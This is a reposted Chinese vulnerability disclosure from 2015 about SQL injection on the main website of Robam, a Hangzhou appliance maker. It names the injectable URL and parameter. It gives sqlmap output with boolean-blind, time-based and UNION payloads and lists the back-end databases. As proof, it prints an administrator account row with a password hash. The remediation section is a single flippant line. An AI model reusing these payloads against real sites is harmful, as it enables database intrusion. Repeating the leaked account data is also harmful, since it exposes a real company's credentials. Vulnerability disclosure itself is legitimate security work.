老板电器主站SQL注入全部信息沦陷

漏洞 作者:Chloe O_o
2015-05-18 301
漏洞标题 老板电器主站SQL注入全部信息沦陷
相关厂商 杭州老板电器股份有限公司
漏洞作者 刻木
提交时间 2015-03-14 21:22
公开时间 2015-04-30 18:48
漏洞类型 SQL注射漏洞
危害等级
自评Rank 20
漏洞状态 未联系到厂商或者厂商积极忽略
Tags标签

漏洞详情

注入点:

http://www.robam.com/minisitea7/newsinfo.php?news_id=1113

漏洞:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: news_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: news_id=1113 AND 5711=5711

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: news_id=1113 AND (SELECT * FROM (SELECT(SLEEP(5)))dEdW)

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: news_id=-6066 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717a71,0x5977
756349414f716977,0x7176717171),NULL,NULL,NULL,NULL,NULL,NULL--
---
[20:09:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.16
back-end DBMS: MySQL 5.0.11

available databases [12]:
[*] bonyee
[*] dbrobamcom
[*] information_schema
[*] mysql
[*] performance_schema
[*] robam_activity
[*] robam_rec
[*] robamse
[*] robamweb
[*] sakila
[*] test
[*] world

漏洞证明:

user_id	usergroup_id	name	account	password	createtime
8 1 超级管理员 admin $2a$10$CP8UCAqaXU06A7.E.rmsW.mBgBmrW6usumTKSiQoJ6HDFoC3IouH2 2014/3/25 17:23

a.PNG

b.PNG

c.PNG

修复方案:

加强过滤或者加个waf什么的。。

能送台油烟机不?

版权声明:转载请注明来源 刻木@乌云


评论  (0)
快来写下你的想法吧!

Chloe O_o

文章数:38565 积分: 0

关注我们

合作伙伴